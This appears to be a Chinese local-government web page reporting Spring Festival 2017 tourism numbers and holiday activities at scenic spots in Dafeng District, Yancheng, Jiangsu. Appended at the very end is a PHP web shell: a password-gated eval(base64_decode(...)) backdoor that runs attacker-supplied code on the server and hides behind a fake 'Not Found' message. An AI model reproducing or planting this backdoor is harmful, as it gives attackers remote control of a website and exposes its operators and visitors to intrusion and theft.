政务公开

首页 > 政务公开 >

    全域旅游看江苏盐城大丰 旅游市场红红火火

           大圣鸣金辞旧岁,雄鸡唱晓贺新春。2017年的春节,江苏省盐城市大丰区旅游市场持续火爆,形势喜人。“新春来麋鹿故乡,享受年味和狂欢”系列旅游活动精彩纷呈,引得众多游客纷纷点赞。春节黄金周期间,大丰区主要景区累计接待游客94.2万人次,旅游综合收入1083.6万元,同比分别增长5.3%和21.5%。

    万亩荷兰花海 大丰旅游局供图

           乘着全域旅游的东风,大丰区旅游市场红红火火、一派繁荣。集聚麋鹿故乡、湿地之都、黄海港城、上海飞地、革命老区、长寿之乡的资源优势,大丰区坚持市场化社会化特色化方向,突出生态旅游、蓝色旅游、乡村旅游、文化旅游四大板块,梯度开发了一个个旅游景区,旅游市场呈现出多样化的特点,让游客们在畅游之时直呼“过瘾”。除了人气爆棚的荷兰花海,声名远扬的国家5A级景区中华麋鹿园,还有颇受长三角地区游客欢迎的恒北村、如诗如画的梅花湾、乡土气息浓郁的三元农庄等等,一个个各具特色的景点景区留下了游客的足迹,赚足了游客的眼球。

     

    群鹿逐雄 大丰旅游局供图

           精心策划,旅游活动吸引力十足。春节期间,大丰区各旅游景区在做好安全预案的前提下,开展了丰富多彩的民俗节庆活动,为游客营造浓浓的传统年味。中华麋鹿园“冬之鹿园”、“一鹿有你”等主题活动既突出年味,又让利游客,引得游客纷纷点赞;荷兰花海“金鸡迎春、与花共鸣”系列活动轮番登场,歌舞、魔术、杂技、婚纱秀等表演轮番登台;梅花湾突出“俏”字,赏梅、赏花灯、猜灯谜、品香茶、品梅花糕、听戏曲、坐花轿……年味十足的活动应接不暇,春节期间游人如织;“扬”溢恒北闹新春活动吸引了众多“上海阿拉”,包饺子、贴春联、吃年夜饭等传统习俗与新农村生活相结合,给游客带来惊喜连连;知青农场“走进民俗文化、品尝农场年味”,大丰港新年嘉年华,七彩花田、东方桃花洲、中华水浒园“年俗体验”,半岛温泉酒店“新春嘉年华”等活动各具特色,既突出传统又体现创意,满足了不同游客的需求。据统计,春节期间大丰区各旅游景区共开展节庆活动40多项,受到游客广泛好评。

     

     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>